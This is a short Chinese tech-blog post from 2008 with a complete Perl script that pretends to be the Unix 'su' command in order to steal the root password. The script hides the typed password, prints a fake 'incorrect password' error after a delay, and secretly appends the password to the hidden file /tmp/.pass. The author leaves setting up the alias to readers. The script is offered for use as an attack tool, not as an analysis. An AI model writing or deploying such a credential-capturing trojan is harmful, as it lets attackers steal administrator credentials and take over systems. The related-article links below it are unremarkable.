冒充su ,perl写的su.pl盗取root密码

 更新时间:2008年09月14日 08:16:59   作者:  
backtrack3里面/pentest/housekeeping里面有个超囧的偷root密码的东西,冒充su ,perl写的,管理员输入密码的时候还直接回显
我改了一下,把回显关了 加了个延时:

#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.

print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);

很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!

相关文章

  • perl中单行注释和多行注释使用介绍

    perl中单行注释和多行注释使用介绍

    在编程时把一段代码注释掉,即通过注释的方法,使其不能够运行,但是依然存在于代码中,等以后需要时再去掉注释
    2013-03-03
  • 基于charles抓取https请求使用过程解析

    基于charles抓取https请求使用过程解析

    这篇文章主要介绍了基于charles抓取https请求使用过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
    2020-11-11
  • perl常问题集合之一

    perl常问题集合之一

    perl常问题集合之一...
    2007-03-03
  • Perl模块编写说明

    Perl模块编写说明

    这两天在用Perl编写一些监控脚本,其实写代码也是一件挺有意思的事情,就是挺废时间的。而且,由于语法不太熟,基本想到一个东西都要先Google一下看怎么实现。
    2008-06-06
  • [Perl]文字/代码批量替换工具

    [Perl]文字/代码批量替换工具

    [Perl]文字/代码批量替换工具...
    2007-04-04
  • perl脚本学习指南--读书笔记

    perl脚本学习指南--读书笔记

    最近在实习,看着公司有些脚本是perl写,久闻perl处理文本还是很强大的,趁着周末扫了一般这本书~记录下了~
    2014-08-08
  • Perl 获取shell命令的执行结果

    Perl 获取shell命令的执行结果

    Perl里可以调用Shell命令,有时需要根据shell命令的返回结果做进一步的工作,如何获得shell的执行结果?
    2008-12-12
  • fdupe 查找重复文件的Perl脚本代码

    fdupe 查找重复文件的Perl脚本代码

    fdupe 是一个很小的 Perl 脚本,用来检索指定目录并找出其中重复的文件,该脚本是通过文件内容来识别是否重复文件,而非文件名。fdupe 无需其他 Perl 脚本支持,运行速度非常快
    2013-03-03
  • perl常见问题集合之二

    perl常见问题集合之二

    perl常见问题集合之二...
    2007-03-03
  • perl中5个常见错误

    perl中5个常见错误

    php是用了很久了,python和ruby与用过,经典脚本语言就perl没摸过,现在在像小学生一样抱着教科书啃。
    2008-09-09

最新评论